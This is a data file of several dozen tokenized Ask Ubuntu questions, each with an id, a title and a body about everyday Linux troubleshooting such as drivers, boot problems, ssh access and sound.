278405	convenient method for frequent ssh	i frequently have to access the departmental servers while i 'm off campus which requires : ssh user @ public.school.com then enter password , then ssh private.school.com then enter same password again . ( you ca n't ssh directly to the second one unless you 're on the campus network . ) how can i make it so that i can just type a simple one-line command and get right into the private server ? i 'm not worried about security here at all , i 'd really like to just skip having to type a password altogether .
278408	can someone recommend a capture card that will work with ubuntu 64bit , xbmc , that i can buy in the us	i am wanting to add a tv capture card that records over the air antenna channels in the us that will work with ubuntu 64 bit and xbmc ? i would like add it to my xbmc system that i have hooked up to my tv so that i can record tv shows and such . i have looked at other post and ca n't seem to find the correct info on the hardware to use and a place to get it . i am thinking someone like new egg or tiger direct online to get the hardware . also will i have to change my video card or add memory to make this work . thanks .
278418	adb devices shows no connected devices , but phone shows up via dmesg and lsusb	i 'm trying to root my motorola photon q ( xt897 ) but i can not see it via adb no matter what . usb debugging is turned on . here is my 51-android.rules subsystem== '' usb '' , attrs { idvendor } == '' 22b8 '' , mode= '' 0666 '' dmesg output when i connect the phone : [ 290.617377 ] usb 2-1 : usb disconnect , device number 2 [ 295.476023 ] usb 2-1 : new high-speed usb device number 4 using ehci_hcd [ 295.611624 ] scsi9 : usb-storage 2-1:1.0 [ 296.610626 ] scsi 9:0:0:0 : direct-access motorola xt897 0001 pq : 0 ansi : 2 [ 296.611152 ] sd 9:0:0:0 : attached scsi generic sg3 type 0 [ 296.613548 ] sd 9:0:0:0 : [ sdc ] attached scsi removable disk lsusb output for the phone : bus 002 device 004 : id 22b8:2e36 motorola pcs but regardless when i run adb devices the list is always empty : root @ cigarbox : /tmp/share # adb devices * daemon not running . starting it now on port 5037 * * daemon started successfully * list of devices attached root @ cigarbox : /tmp/share # there are no complaints i can see in the /var/log/udev stuck ! ! is there a way to test udev on its own somehow ?
278419	why `` sudo apt-get install '' does n't find a package ?	i am getting this error : sudo apt-get install emacs23 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package emacs23 moreover , i ran : sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i have the latest public release version 12.10 quantal quetzal of ubuntu .
278426	how to properly install graphics drivers in 12.10	okay so im new to linux operating systems and im having trouble installing my graphics driver i asked a question before but i 'm going to try to be more specific this time . i have a 19.5 inch monitor and im using a gtx 550ti gf card and ive tried multiple ways of installing my drivers . but i fear that i might of tried to many ways and one of them worked but i dont really know how to remove them . so could someone please explain how to removed and install my drivers properly ? ( the problem i have is not getting a high enough resolution . and it tends to make my mouse not work properly in some screens i get stuck at 1024 x 768 )
278434	much lower battery life on ubuntu and laptop heating up badly	i have the following config laptop : system model : hp pavilion g6 notebook pc processor : amd a8-4500 apu with radeon hd graphics ( quadcore 1.9ghz ) memory : 6gb ram graphics : amd radeon hd 7640g+7600m dual graphics i usually get a battery run time of 2.5 hours and more in windows , but when i run ubuntu , it gives me less than 40 mins and it heats up very badly . can someone please tell me what to do to get a better battery life and processing power . it would be helpful if some one could give me specific instructions .
278441	how to show failed ping ?	when we are using windows ping , it will show the failed pings . does ubuntu have similar function ? the failed ping is quite useful when debugging the network . how you guys solve this ? well , i only want simple solution , i do n't want to get a long script .
278448	how to know what program is listening on a given port ?	i suspect a program is listening on port 8000 on my machine . when i run the following command , i get that error : > python -m simplehttpserver # lots of python error socket.error : [ errno 98 ] address already in use if i use another port ( 8000 is the default ) , this simple web server runs fine . if i wget localhost:8000 , it returns 404 not found . my question is : what can i do , what tools are available to find which program is listening on port 8000 ? where is it configured ?
278457	netflix wont work without new silverlight update	ive looked through the answered questions here and none of the solutions work . i 'm running ubuntu 12.10 , 64 bit on a system 76 lemur ultra . netflix was working fine up until about 2 or 3 days ago , where it now prompts me to update silverlight . the title selection screen of netflix desktop comes up just fine , when launched from the terminal there are no errors . ive tried to fix this problem by uninstalling and re installing netflix-desktop using the `` sudo apt-get -- purge remove netflix-desktop '' ive tried uninstalling netflix-desktop with the above command and uninstalling the ehoover ppa with `` sudo apt-add-repository -- remove ppa : ehoover/compholio '' and then reinstalling them both according to the guide you can find just about anywhere ive tried installing the silverlight .exe and running it , it is also not effectual . in searching i have found this proposed solution that was applied about 2 months ago ... '' the new version of netflix desktop moves the profile location from ~/.netflix-desktop to ~/.wine-browser . you might try renaming/deleting the ~/.wine-browser folder and relaunching netflix-desktop ( or redbox-desktop ) so that it creates a new profile . '' but i have no idea how to find/rename/remove the ~/.wine-browser folder ... if nothing else , how do i find and rename/remove that folder so i can try relaunching netfix desktop ? otherwise , are there any other work arounds to get netflix running ? or is there somewhere i can find an updated ppa ? i 'm pretty sure all my stuff is up to date , but am willing to run whatever tests anyone recommends to verify this . a lot of people are having this problem so i dont think its a bug , and its happening very recently , so i dont think its the same problem as last february , though im hoping it has the same solution . thanks for your time , and hopefully , your answers
278464	bluej is not working	i 'm new to ubuntu . i had installed jdk 7 but still bluej is not working . i need help as i need bluej for my school activities and java programming .
278468	i have lost data but it 's not deleted or overwritten	i am a beginner , so i know nothing . i installed lubuntu 12.04 so that i can learn , but i mistakenly installed it on a partition that contains 90 gigabytes of data . however , my data was n't deleted : i knew that when i wanted to install windows that my data is still there , by knowing the used space of the hdd . now the problem is : i ca n't find my data on linux in the same partition , neither can i find the whole partition in windows . i think it 's hidden , so how can i show it ? if it is n't hidden how can i find it ? ? the data was in the form of multiple files and various kinds ( video , docs , music..etc ) .
278470	dell inspiron n4010 wi fi not connected	i 'm using dell n4010 lapt0p and i installed ubuntu 10.04 desktop edition but i 'm unable to connect with wireless network ? my lspci output is 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 03:00.0 network controller : broadcom corporation device 4727 ( rev 01 ) 04:00.0 ethernet controller : atheros communications ar8152 v1.1 fast ethernet ( rev c1 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) and my iwconfig output is : iwconfig lo no wireless extensions . eth0 no wireless extensions . pan0 no wireless extensions . my rfkill output is rfkill list all 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no and my lspci -nn -d 14e4 : output is : 03:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:4727 ] ( rev 01 ) now what am i do please help me ?
278471	how to set kmix default volumes ?	i have a strange problem with kmix . i want to record tv streams , this is already working . but with every restart , kmix mutes the recording device . because this , the tv recording program ( mencoder & v4l2 ) canot record any sound ( records from line-in ) . if i turn up the recording volume in kmix , sound is recorded . how can i set the default volume in kmix ? i have the `` restore volumes at startup '' box checked , but record level is always muted at every boot . sometimes the playback , too . if i uncheck it , reboot , and check again , and reboot , nothing changes . i have googled a lot , but i have found nothing : s i can agree with command line solutions , which i put in startup , or something , too ... i 'm using kubuntu 11.10 thanks for any help !
278473	canon lide 110 : should reconnect usb for each scan	i have a canon lide 110 scanner which works by default on ubuntu 12.10 64bit . the problem is after first scan i can not scan for second time . i should reconnect usb cable to use scanner again . i use simple scan application to scan photos and text . lsusb shows my scanner as : bus 003 device 010 : id 04a9:1909 canon , inc. canoscan lide 110 i have tried usb 2.0/3.0 ports . the same thing happens for both . dmesg shows : [ 7747.558086 ] usb 3-3 : new high-speed usb device number 11 using xhci_hcd [ 7747.575766 ] usb 3-3 : new usb device found , idvendor=04a9 , idproduct=1909 [ 7747.575775 ] usb 3-3 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 7747.575779 ] usb 3-3 : product : canoscan [ 7747.575782 ] usb 3-3 : manufacturer : canon how can i fix this problem ? thanks in advance for any tips .
278476	ubuntu install partitions - automatic is not working	so i 'm trying to install ubuntu on a vm ... i 've come to the installation type page and i tried to just use the `` erase disk and install ubuntu '' option ... when i do this it 's saying that some of the partitions are too small and i have to go back and change them . i 've installed ubuntu a few times and this has never happened . any ideas how i can install and do i need to change anything ? i 'm a fairly virgin user so i have no idea what to do ...
278477	how can i make f9 key to compile ( in c++ ) in vim ?	i tried imap < f9 > : ! g++ % - ( without spaces ) , but it does n't work . edited : so stupid , i wanted to say map < f9 > : ! g++ % - without spaces ... but i figured out that the spaces are the problem .
278479	ubuntu boot option does not appear while booting ; installed ubuntu with windows 8	i have installed ubuntu 11.10 on a separate disk , ( that previously was unallocated space ) following the link : link to the installation guide running the installer from try ubuntu option . installation was carried out successfully . i can even see all disks in windows 8 disk manager but cant boot into ubuntu , because there is no boot option for that . the system automatically logs into windows 8 . holding on left shift key after the system boots up also does not help . could you please guide me how to install the grub so that i have both options when i start up my pc ? ( i have been messing up with my pc and ultimately blew up all my drive data )
278483	lenovo ideapad s400u	i 'm going to buy this machine ( lenovo ideapad s400u ) does someone know if it 's completely compatible with ubuntu ?
278484	32-bit or 64-bit	i 'm installing 12.04 on to my desktop . i just have a question on which version is better for my hardware . my specs are : processor : intel core i5 2400 @ 3.10ghz sandy bridge 32nm technology ram 4.00 gb dual-channel ddr3 @ 662mhz ( 9-9-9-24 ) motherboard asustek computer inc. p8h67-m le ( lga1155 ) graphics amd radeon hd 6800 series ( ati aib ) hard drives 466gb western digital wdc wd5000aaks-22v1a0 ata device ( sata ) optical drive atapi ihas424 b ata device audio creative x-fi audio processor ( wdm )
278486	iptables proxy host on port	i have 2 servers from 2 different companies the first server is a vps where i host my websites ( lets say it has ip 5.5.5.5 ) the second server is a minecraft server ( lets say it has ip 6.6.6.6 ) on my vps i have a domain and subdomain for the minecraft website ( lets say its mc.example.com ) if you would go to mc.example.com on your browser , you would end up on 5.5.5.5 and on the website . what i 'm trying to do is , from minecraft when you go to mc.example.com , you would end up on 6.6.6.6 . so for example : mc.example.com:80 - > 5.5.5.5:80 mc.example.com:25565 - > 6.6.6.6:25565 now , my network interfaces are as follows i have two ips on my vps , the main one is venet0:0 ( 5.5.5.5 ) this are the network interfaces auto lo iface lo inet loopback address 127.0.0.1 netmask 255.0.0.0 broadcast 127.255.255.255 up ip route replace 127.0.0.0/8 dev lo # auto generated venet0 interfaces auto venet0 iface venet0 inet static address 127.0.0.1 netmask 255.255.255.255 broadcast 0.0.0.0 up route add -net 191.255.255.1 netmask 255.255.255.255 dev venet0 up route add default gw 191.255.255.1 auto venet0:0 iface venet0:0 inet static address 5.5.5.5 netmask 255.255.255.255 auto venet0:1 iface venet0:1 inet static address 4.4.4.4 netmask 255.255.255.255 can someone please tell me what commands i would need to write in iptables in order to proxy that minecraft server from my vps ? thank you !
278491	amd graphic installition error	i got this error when i try to install the amd grapich supported adapter detected . check if system has the tools required for installation . fglrx installation requires that the system have kernel headers . /lib/modules/3.5.0-26-generic/build/include/linux/version.h can not be found on this system . one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended . how can i fix it please replay fast ..
278493	how to change the background color of terminal in ubuntu 12.10 ?	how to change the dark purple color of terminal in ubuntu 12.10 . and can we place any image or photo instead of that purple color .
278498	how to replace ubuntu 32-bit with 64-bit in dual boot ?	i just got a new lenovo ideapad y580 running windows 8 . today i took my first crack at dual booting ubuntu on it . since 32 bit is marked recommended , that is what i downloaded , but apparently it is not compatible with the uefi windows 8 requires , so it never properly installed . i have read that i will need a windows 8 recovery disk to rehabilitate my machine after uninstalling ubuntu , but my machine did not come with one , and it would take a long time to get one shipped to me at the location i 'm at . what is the best way to remove ubuntu 32 bit and replace it with 64 bit while leaving windows 8 intact ?
278499	sometimes get blank screen after grub	i 'm having a problem with a new computer from here : http : //www.dabs.com/products/zoostorm-value-pentium-dual-core-g840-6gb-ram-250gb-hdd-no-os-7xql.html ? refs=459610000 & src=2 at first i installed linux mint and everything seemed to work fine until i turned the computer on the next day and it got stuck on a blank screen after grub . booting using recovery mode it gets stuck at `` loading initial ramdisk '' indefinitely . after trying to fix this i decided to try kubuntu , the problem occurs just the same . i have found a way to boot kubuntu by using the system settings option at grub , and then selecting 'save and exit ' in the bios settings , after which the computer will boot normally . does anyone have suggestions ? thanks !
278500	uninstall empathy without affecting dependencies	i am trying to uninstall empathy from my ubuntu 12.10 . so i issued the following command sudo apt-get purge empathy reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : account-plugin-identica account-plugin-twitter gir1.2-messagingmenu-1.0 use 'apt-get autoremove ' to remove them . the following packages will be removed : account-plugin-aim* account-plugin-jabber* account-plugin-salut* account-plugin-yahoo* empathy* **gnome* gnome-core*** mcp-account-manager-uoa* nautilus-sendto-empathy* 0 upgraded , 0 newly installed , 9 to remove and 0 not upgraded . after this operation , 8,664 kb disk space will be freed . do you want to continue [ y/n ] ? it is trying to remove gnome and gnome-core by default . will it really uninstall gnome as well ? how do i uninstall empathy without affecting gnome ? edit : as suggested by vasa1 in the comments , i tried marking the packages as manual using sudo apt-mark manual gnome gnome-core that also didnt help .
278503	no sound with hda intel pch	i do n't manage to get sound working on my ubuntu 12.10 . the output of my alsa-info.sh is located here . i would appreciate any help to fix this problem !
278507	grub2 is always asking which version to boot	i recently upgraded from 12.04 to 12.10 after grub crashed and i landed in the rescue prompt . after a new clean install of 12.10 and running boot-repair from a livecd ( grub was still somehow damaged and was not properly reinstalled ) grub2 always asks me when booting if i want to boot the standard ubuntu , recovery moder etc ... is there a simple way to set ubuntu normal mode as standard boot so that i only have to go to the boot menu if i want to boot one of the other modes ? thanks !
278510	how to alter the keyboard layout key-by-key ?	i would like to change my keyboard layout individually . for example switch the a key to b . do i need a special software or is it possible directly in ubuntu 12.04 ? i found a ru file under /usr/share/x11/xkb/symbols which represents the keyboard layout . unfortunately , i do n't really understand the data structure . if this is the only way to change the keyboard layout individually where can i find more information on the data structure and how to change it ?
278516	how to disable laptop 's lcd and use external monitor as only output ?	my laptop 's lcd broke and i removed it . now i permanently added a monitor via hdmi . how can i set up ubuntu 12.10 to only use and show the external monitor and disable the lcd ? right now , i can not permanently increase the monitors resolution and i guess this problem would disappear if i disabled the lcd display .
278518	can not install broadcom 802.11 linux sta wireless driver ?	being a newbie in linux , i installed the wubi version of ubuntu 12.10 on my win xp . all is well , except that i have trouble installing the above mentioned driver . installing from software center : when i try to install , i get the message : '' package dependencies could not be installed : bcmwl-kernel-source : depends : dkms : but it will not be installed . installing the driver from the broadcom site : http : //www.broadcom.com/support/802.11/linux_sta.php i get the following message during make : asm/system.h does not exist . i would gladly receive advise on what to do next .
278520	`` run in terminal '' option in nautilus actions configuration tool does n't work	i 'm running ubuntu 12.04 and nautilus actions configuration tool 3.1.4 . when ever i select the option 'run in terminal ' in execution tab ... it does n't work . the comand i 'm running shows a progress bar which is not visible using any other option . how can i fix this ?
278522	migrating root.disk problem	my ubuntu 11.10 got corrupted today . i had installed it using wubi installer i copied root.disk file from there . now i installed ubuntu 11.10 using wubi on different computer.can i use my older root.disk under this wubi install on my new computer . i replaced my newer root.disk with older one but it does n't work . help me fast .
278523	how can i make '/etc/vim/vimrc ' writeable ?	i tried with chmod u+w vimrc but it does n't work . i also tried : w ! and still does n't work . the point is that i make a mistake deleting some `` in vimrc and now i do n't know how to write it back there .
278526	how to run a realtime kernel in virtualbox ?	i am looking to do some c programming in 12.10 and require a real time kernel for what i need to do . ideally , i 'm looking to be able to run this in virtualbox , with guest additions installed . can anyone advise me on how to achieve this ? what 's the best option available in terms of rt kernels ?
278527	sharing playlist between any music player in windows and ubuntu	is there a way to share playlists between windows and ubuntu ? i use itunes on windows and rhythmbox on ubuntu , but i can switch to any music player on both sides if it will enable sharing of playlists .
278529	how to start a terminator instance always with a set of terminals ( each one in a different directory ) in one window	i want to open the same set of directory locations in one terminator window as multiple terminals every time by default ( or when i run a script ) . i think it could be done via profiles or layouts . man terminator_config was not very helpful .
278531	“x shares a lot of system state across process boundaries”	the background i was to get informed about the state of wayland adoption by ubuntu , when i learned it 's not any more an option and there is something named mir in the place instead . so i wanted to learn more about the reasons . the question the page mirspec at wiki.ubuntu.com says : with respect to shell development ( unity ) , three major shortcomings of the x stack prevent us from delivering the user experience ( f’n’f ) we have in mind : x shares a lot of system state across process boundaries . [ … ] … i could not understand the sentence i underlined in bold , which seems to be an important point understanding both x and mir . is there any kind of practical/concrete pictures to explain what this statement means ?
278534	startup script for spawn-fcgi	i would like to use spawn-fcgi to start a web.py application on system boot . is there any facility for managing spawn-fcgi through upstart ? ( is upstart the modern system for managing services , or should i be looking somewhere else ? )
278539	how to transfer files from samsung galaxy to ubuntu 12.04 ?	i have a samsung galaxy gt-s7562 with android 4.0.4 and ubuntu 12.04 on a dell vostro 1510 . i have just found out i can not transfer files from android to ubuntu with a usb connection because the former uses mtp . gmtp did n't help . i also found out ubuntu ca n't get my bluetooth working either . so i ca n't transfer files this way either . can i use make a transfer via a wireless network ? what other options are left ?
278544	how to make ubuntu not ask for password after login	i 'm not trying to delete my password or anything . i just want ubuntu to remember my password after i login as an admin user and use that when installing/removing software or running sudo commands . the non-admin users should be prompt for the admin password though . is there a way to do that and if so why does n't ubuntu do that as default ?
278545	usb keyboard and mouse no longer work after grub boot	my usb keyboard and mouse do n't work when booting into ubuntu 12.04 . the keyboard is fine up until the boot loader ( grub ) . i can select previous kernels or recovery mode . but regardless of the choice , once the boot progresses , both keyboard and mouse are no longer active . up until today it had been working fine - i 've not made any changes to the system . i seem to remember having a similar issue before , which had something to do with having a usb hdd connected in a previous session . my mouse and keyboard are working in principle ... great . but ! it takes 2-3 minutes after booting for these to be recognized . ( guess i was too impatient previously ) . this certainly was not the case up until today . any ideas ?
278546	generating menu in ubuntu	i want to change gui menu of ubuntu . that is , i want to add a icon at the menu ( top of screen ) , after clicking that a menu will be shown and selecting particular option will run a particular command . can some please help me
278549	will ubuntu get an asset set to allow qt applications using gtk style buttons ?	given the recent movement towards qt as a primary development platform for ubuntu and the underlying gnome standard application set : are there plans to have gtk style buttons available in a simple way to qt-creator , should we expect to see the ubuntu standard applications start to be more like kubuntu standard applications , or something else ? if something else , what ?
278550	how do i share my audio cd ?	i used to use samba to share my cd 's including audio cd 's . i used to mount them `` /mnt/cdrom '' or `` /media/cdrom '' with a entry in `` /etc/fstab '' and entry in `` smb.conf '' to share that location but now ! i put the audio cd in , and the pc auto mounts ( may be ? it appears in the file broswer ) it but where ? i have googled and found `` /username/.gvfs/nnnnnnnnn '' there are problems with this . the path changes with each user depending on who is logged in at the time . the path does not show in the standard ways ( cat /etc/mtab ) the path can not be put statically into smb.conf because it changes see above on and on and on so how to i share the audio cd i put in to the pc ?
278551	error mounting usb	i 've just installed ubuntu on my laptop and i tried to open my usb directory , but it gives me the error unable to mount location , ca n't mount file . what can i do to open it ?
278555	mouse clicks ignored by applications on 12.10 new install	i am having issues with 12.10 . ( i see the same issue posted here , but unsolved ) the mouse seems to work on some parts of ubuntu and not others . for example , i can open apps ( i.e . chromium ) using the left home bar thing , and if they are full-screen , with the button , i can navigate through folders , but if i open a web browser , i can not click on anything in the browser , though i can use the keyboard and tab around . if the web browser is also not full screen , and the close/min/max buttons are on the top right , in black , i can not use them . when this is the case , the mouse is not at all frozen . i can move the cursor freely , open new apps , navigate through ubuntu , only can not click in any open apps with the mouse . there is nothing wrong with the mouse , as it works great on windows machines , and i have tried wired mircosoft mice to the same effect . i had this problem after roughly 1 restart out of 5 when this was a win7/ubuntu 12.10 dual boot . then a week ago , i redid partitions , deleted everything , reinstalled ubunt 12.10 and mouse clicks ignore problem resumed right away , again after roughly 1 restart out of 5 . my hardware : hp dv7 quad i5 , 8mb ram , 750 hdd , microsoft wireless mouse and keyboard . ubuntu 12.10 thanks , rock .
278557	problem downloading or installing anything from software center	i 've been trying for days now to install eclipse on ubuntu 10.10 but it never works . if i double click on eclipse icon , it does nothing . i 've tried to change permission and applying methods i found but none of them works . also software center is not downloading or installing anything . it shows errors similar to this one : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/maverick-backports/multiverse/binary-i386/packages.gz 404 not found [ ip : 91.189.92.202 80 ] e : some index files failed to download , they have been ignored , or old ones used instead . or e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ?
278563	can i choose the position of a partition while installing ubuntu as a dual boot with windows ?	when installing ubuntu , is there a way you can choose which part of the disk you want your partition to be on ? i am partitioning a 2tb hdd , giving 300gb to ubuntu , however i do n't want this partition in the middle of the hdd , as it is used as my storage drive for windows .
278567	booting does not work	i recently had my ubuntu installed and i 'm still learning the software . today when i turned my computer on i get the screen this : ubuntu with linux 3.2.0-38-generic ubuntu with linux 3.2.0-38-generic ( recovery mode ) previous linux versions memory test ( memtest86+ ) memory test ( memtest86+ , serial console 115200 ) i 've tried every option and no success . i did n't install it so i do n't have any disks . what happen and can i fix it ?
278573	choosing c++ debugger on linux	i recently changed from windows where i was using qt creator to ubuntu . the problem is that qt creator in ubuntu ca n't properly debug due to some problem attaching ptrace to the program which was cause by a security upgrade as i found out . the only way to debug is to mess with the system settings and change the ptrace variable configuration but i 'm not comfortable with this , as it compromises security . so my question is , is there anything close to qt creator or visual studio debugger in linux ? i mean being able to track variable values and pointers , etc . if not what 's the standard debugger for linux ? i do n't mind using console tools as long as they offer the same functionality
278578	ubuntu 11.04 not booting up	i try to boot up and get the following text on screen : the postgresql server failed to start . please check the log output : starting postfix mail transport angen postfix speech-dispatcher disabled : edit /etc/default/speech-dispatcher starting the winbin daemon winbind starting bluetooth pulseaudio configured for per-user sessions saved disabled : edit /etc/default/saved starting web server apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using : :1 for server ... checking battery state ... then it just holds there and shuts down . how can i get it to boot up ? the last thing i remember doing was changing the computer name ... i can access the console in recovery mode , but it 's only got read and write permissions so i ca n't move any of the data on there - i really need to save some databases and move them to a different machine .
278583	fresh install of ubuntu 12.10 keyboard and mouse problem	i have just done a fresh install of ubuntu 12.10 and when it booted up i had to press they keyboard buttons multiple times and really hard to type my password , i tried turning off the laptop when i tried to turn it on i had to force in the power button to get it to turn on . now the mouse is going really slowly but an external keyboard is working . i did not have this problem on the live install and i have had wubi on this laptop before . ( now it is just ubuntu ) i have done a complete reinstall of ubuntu and it is the exact same , external mouse and keyboard working fine . i feel like it is the drivers . is there a way to reinstall the relvant drivers ? any idea what might be causing the problem ? is there any other information i need to post ?
278588	wireless not work on ubuntu 12.10 realtek rtl8111/8168b	im from argentina and i bought a notebook bangho futura 2521 . i have installed ubuntu 12.10 and i cant work the wifi ... the command lspci shows : 02:00.0 network controller : realtek semiconductor co. , ltd. device 8723 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) 03:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 0a ) the command iwconfig shows : eth0 no wireless extensions . lo no wireless extensions .
278592	installation fails when trying to create an efi partition on an asus ux32vd ( double ssd model )	i 've purchased an asus ux32vd ultrabook that has 2 ssd in raid 0 configuration . i 've managed to remove windows 8 but i ca n't boot in ubuntu . when it try to create an efi partition the installation fails . without the efi partition the installation finishes but no drives are shown in bios boot options . any help will be much appreciated .
278598	no audio with a ms lifecam cinema	i searched the forum and web to no avail . i am running ubuntu 12.10 and am trying to get a microsoft lifecam cinema setup . the video was plug-and-play but no joy with the audio . i have used alsamixer and confirmed all settings . the mic is unmuted and i have adjusted the capture volume level . what am i missing . i have been successfully using a logitech cam with no issues at all , but my lifecam 's video quality is much better . any help is much appreciated ...
278600	how to export saved ftp password from gnome commander ?	i am migrating to another computer . and i need saved ftp passwords from gnome commander which i was using for the connection . where should i search for these password ?
278601	maximum sound level differs between ubuntu and windows	recently i 've been watching lots of .mkv or .avi files in my ubuntu and i realize that the maximum sound level is lower than what is in the windows with km player . this difference is very noticeable in my ubuntu and bothers me . is there a solution to this ? i have checked all sound levels in ubuntu , the default and movie player sound level .
278602	ubuntu 12.10 - ttys not working on macbook pro 9,1	on my ubuntu install on my macbook pro 9,1 ( late or early 2012 , iirc ) , the graphical mode works fine . however , when i switch to a tty ( ctrl+alt+f1-through-f6 ) , the screen seems to completely turn off ( not even the backlight stays on ) . i can return to the graphical mode , but the area where the dock usually resides shows random gibberish until i reveal the dock ( i have it set to auto-hide ) . i am using the nvidia proprietary drivers , with the intel hd integrated gpu disabled and it 's kernel module blacklisted ( this machine has hybrid graphics ) . when i use ubuntu 's recovery mode , i can see the text-only interface . if i select failsafex , then switching to a tty once i see the limited graphics mode dialogue pop up does n't work . i have tried the answer from : `` why does switching to the tty give me a blank screen ? `` , and tried booting with nomodeset , but the issue remains .
278605	can connect to wireless . no internet connection	i 'm connected to my wireless but i ca n't get any internet . ubuntu 12.10 network card : atherors ar928x adapter . ifconfig wlan0 wlan0 link encap : ethernet hwaddr 70:1a:04:3e:26:06 innet addr:10.0.0.2 bcast:10:0:0.255 mask : 255.255.255.0 inet6 addr : fe80 : :721a:4ff : fe3e:2606/64 scope : link up broadcast runn multicast mtu:1500 metric:1 rx packets : 5335 errors:0 dropped:0 overruns:0 frame:0 tx packets:7885 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes ( 719.0 kb ) tx bytes ( 695.5 kb ) a ping on 127.0.0.1 was the only ping that worked , not sure what that is though , my local ip address 10.0.0.1 . i already tried rebooting the wireless . i just changed from linux mint to ubuntu . looking on my routers setting it showed my computer up as connected , but next time i looked it did n't .
278606	how can i create an activity indicator in ubuntu touch ?	i tried looking for the images to create an spinner like the ones found in other ubuntu touch apps . i found this image , but it is n't spinning : source : http : //bazaar.launchpad.net/~ubuntu-sdk-team/ubuntu-ui-toolkit/trunk/view/head : /themes/ambiance/qmltheme/artwork/spinner % 408.png how do i create an activity indicator and make it spin like other apps do ?
278616	flash videos do not stay full screen on second monitor	when i watch hulu on my second monitor the screen does not stay full screen when clicking on my main monitor . is there a setting i can change to fix that ?
278617	install xubuntu from cd without using graphical installer ?	i have an older machine onto which i 'd like to install xubuntu 12.04 32bit desktop . i have prepared the cd , and can boot from it , but the graphical installer is slow to the point of uselessness while running from cd . i do want to install xfce , i just want to avoid the graphical installer . wifi coverage appears to be poor in this location and moving the machine is impractical , so i 'd like to install as much as possible from cd and get a desktop up and running , see if it will be usable when running from hd , test wifi , and iron out connectivity later , which rules out the network install suggested in this answer is there a way to boot from the xubuntu cd but bypass the graphical installer ? if not , is there a way to improve performance of the cd installer , perhaps by creating a tmp swap partition on an hd , or by copying the cd to an hd to run from there ? the target machine has two smallish ( 60-80gb ) hdds with no data to be retained ; i can repartition as needed .
278622	`` “the system is running in low-graphics mode” acer 3820tg , ubuntu doesnt boot : (	i 'm linux newby and im using ubuntu 12.04 ( 64bit ) on acer timeline 3820tg . everything worked fine until i unplugged the power adaptor . well in batterymode everything was still okay , but when i tried to reboot , i get the error : “the system is running in low-graphics mode” . and i ca n't reboot even with the power supply . now i 've tried all of these proposes : how to fix `` the system is running in low-graphics mode '' error ? none worked . i think the problem is my graphics . my acer has two graphic cards : - amd mobility radeon hd 5650 - intel hd in win7 , it changes to the intel when i am on battery and switches back to when power supply is plugged in . so what can i do ? i now that this switching wont be able under ubuntu , but how can i get my ubuntu back at all ? thank you !
278624	nvidia optimus hdmi out tutorial not working correctly	after recently installing ubuntu 12.04 desktop edition lts on my nvida optimus equipped laptop ( asus n53j ) i tried to get hdmi out to work by using the method described in this guide here . i am able to move my mouse off screen but the lxde session does not show up on my external monitor . i have tried it with 2 diffrent monitors and many reboots with no success . i have installed bumblebee successfully and both the nvidia graphics card and the intel integrated graphics run well on the laptop monitor . here is a paste of the terminal that i started the session from . note : retry in 1 second message repeats forever . linux-user @ marble : ~ $ sudo ~/hdmi [ sudo ] password for linux-user : obt-message : xinerama extension is not present on the server xscreensaver : 10:51:29 : locking is disabled ( running as nobody ) . xscreensaver : 10:51:29 : locking only works when xscreensaver is launched by a normal , non-privileged user ( e.g. , not `` root '' . ) see the manual for details . ( polkit-gnome-authentication-agent-1:2189 ) : polkit-gnome-1-warning ** : unable to determine the session we are in : gdbus.error : org.freedesktop.consolekit.manager.generalerror : unable to lookup session information for process '2189' openbox-message : requested key `` xf86terminal '' does not exist on the display ** ( update-notifier:2206 ) : warning ** : not starting for system user home directory 